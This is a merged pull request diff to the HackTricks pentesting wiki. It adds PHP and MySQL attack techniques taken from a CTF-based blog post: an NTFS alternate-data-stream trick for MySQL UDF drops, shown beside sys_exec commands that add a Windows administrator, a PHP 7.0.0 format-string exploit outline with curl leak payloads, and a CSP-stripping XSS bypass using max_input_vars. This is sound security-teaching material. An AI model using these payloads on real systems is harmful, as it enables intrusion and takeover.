Merge pull request #1372 from HackTricks-wiki/update_The_Art_of_PHP__CTF_born_exploits_and_techniques_20250830_123618

The Art of PHP CTF‑born exploits and techniques

Author: carlospolop

src/network-services-pentesting/pentesting-mysql.md

@@ -289,6 +289,17 @@ SELECT sys_exec("net user npn npn12345678 /add");
 SELECT sys_exec("net localgroup Administrators npn /add");
 ```
 
+#### Windows tip: create directories with NTFS ADS from SQL
+
+On NTFS you can coerce directory creation using an alternate data stream even when only a file write primitive exists. If the classic UDF chain expects a `plugin` directory but it doesn’t exist and `@@plugin_dir` is unknown or locked down, you can create it first with `::$INDEX_ALLOCATION`:
+
+```sql
+SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
+-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory
+```
+
+This turns limited `SELECT ... INTO OUTFILE` into a more complete primitive on Windows stacks by bootstrapping the folder structure needed for UDF drops.
+
 ### Extracting MySQL credentials from files
 
 Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**
@@ -749,6 +760,7 @@ john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
 - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
 - [Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
 - [mysql-fake-server – Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
 
 

src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md

@@ -1,4 +1,4 @@
-# PHP - RCE abusing object creation: new $\_GET\["a"]\($\_GET\["b"])
+# PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -97,11 +97,34 @@ It's noted that PHP temporarily stores uploaded files in `/tmp/phpXXXXXX`. The V
 
 A method described in the [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) involves uploading files that trigger a server crash before deletion. By brute-forcing the name of the temporary file, it becomes possible for Imagick to execute arbitrary PHP code. However, this technique was found to be effective only in an outdated version of ImageMagick.
 
-## References
+## Format-string in class-name resolution (PHP 7.0.0 Bug #71105)
 
-- [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
+When user input controls the class name (e.g., `new $_GET['model']()`), PHP 7.0.0 introduced a transient bug during the `Throwable` refactor where the engine mistakenly treated the class name as a printf format string during resolution. This enables classic printf-style primitives inside PHP: leaks with `%p`, write-count control with width specifiers, and arbitrary writes with `%n` against in-process pointers (for example, GOT entries on ELF builds).
 
-{{#include ../../../banners/hacktricks-training.md}}
+Minimal repro vulnerable pattern:
+
+```php
+<?php
+$model = $_GET['model'];
+$object = new $model();
+```
+
+Exploitation outline (from the reference):
+- Leak addresses via `%p` in the class name to find a writable target:
+  ```bash
+  curl "http://host/index.php?model=%p-%p-%p"
+  # Fatal error includes resolved string with leaked pointers
+  ```
+- Use positional parameters and width specifiers to set an exact byte-count, then `%n` to write that value to an address reachable on the stack, aiming at a GOT slot (e.g., `free`) to partially overwrite it to `system`.
+- Trigger the hijacked function by passing a class name containing a shell pipe to reach `system("id")`.
 
+Notes:
+- Works only on PHP 7.0.0 (Bug [#71105](https://bugs.php.net/bug.php?id=71105)); fixed in subsequent releases. Severity: critical if arbitrary class instantiation exists.
+- Typical payloads chain many `%p` to walk the stack, then `%.<width>d%<pos>$n` to land the partial overwrite.
 
+## References
+
+- [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
+{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-web/content-security-policy-csp-bypass/README.md

@@ -693,6 +693,27 @@ Then, the technique consists basically in **filling the response buffer with war
 
 Idea from [**this writeup**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points).
 
+### Kill CSP via max_input_vars (headers already sent)
+
+Because headers must be sent before any output, warnings emitted by PHP can invalidate later `header()` calls. If user input exceeds `max_input_vars`, PHP throws a startup warning first; any subsequent `header('Content-Security-Policy: ...')` will fail with “headers already sent”, effectively disabling CSP and allowing otherwise-blocked reflective XSS.
+
+```php
+<?php
+header("Content-Security-Policy: default-src 'none';");
+echo $_GET['xss'];
+```
+
+Example:
+```bash
+# CSP in place → payload blocked by browser
+curl -i "http://orange.local/?xss=<svg/onload=alert(1)>"
+
+# Exceed max_input_vars to force warnings before header() → CSP stripped
+curl -i "http://orange.local/?xss=<svg/onload=alert(1)>&A=1&A=2&...&A=1000"
+# Warning: PHP Request Startup: Input variables exceeded 1000 ...
+# Warning: Cannot modify header information - headers already sent
+```
+
 ### Rewrite Error Page
 
 From [**this writeup**](https://blog.ssrf.kr/69) it looks like it was possible to bypass a CSP protection by loading an error page (potentially without CSP) and rewriting its content.
@@ -837,6 +858,7 @@ navigator.credentials.store(
 - [https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/](https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/)
 - [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)
 - [https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket](https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
 ​
 

src/pentesting-web/file-inclusion/README.md

@@ -753,6 +753,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
 - [watchTowr – We need to talk about PHP (pearcmd.php gadget)](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/)
 - [Orange Tsai – Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/)
 - [VTENEXT 25.02 – a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
 {{#file}}
 EN-Local-File-Inclusion-1.pdf

src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md

@@ -260,6 +260,7 @@ function find_vals($init_val) {
 ## More References
 
 - [https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/file-upload/README.md

@@ -166,6 +166,10 @@ Note that **another option** you may be thinking of to bypass this check is to m
 
 - [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
 
+### Corrupting upload indices with snprintf quirks (historical)
+
+Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases.
+
 ## From File upload to other vulnerabilities
 
 - Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
@@ -335,5 +339,6 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 - [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 - [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 - [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
 {{#include ../../banners/hacktricks-training.md}}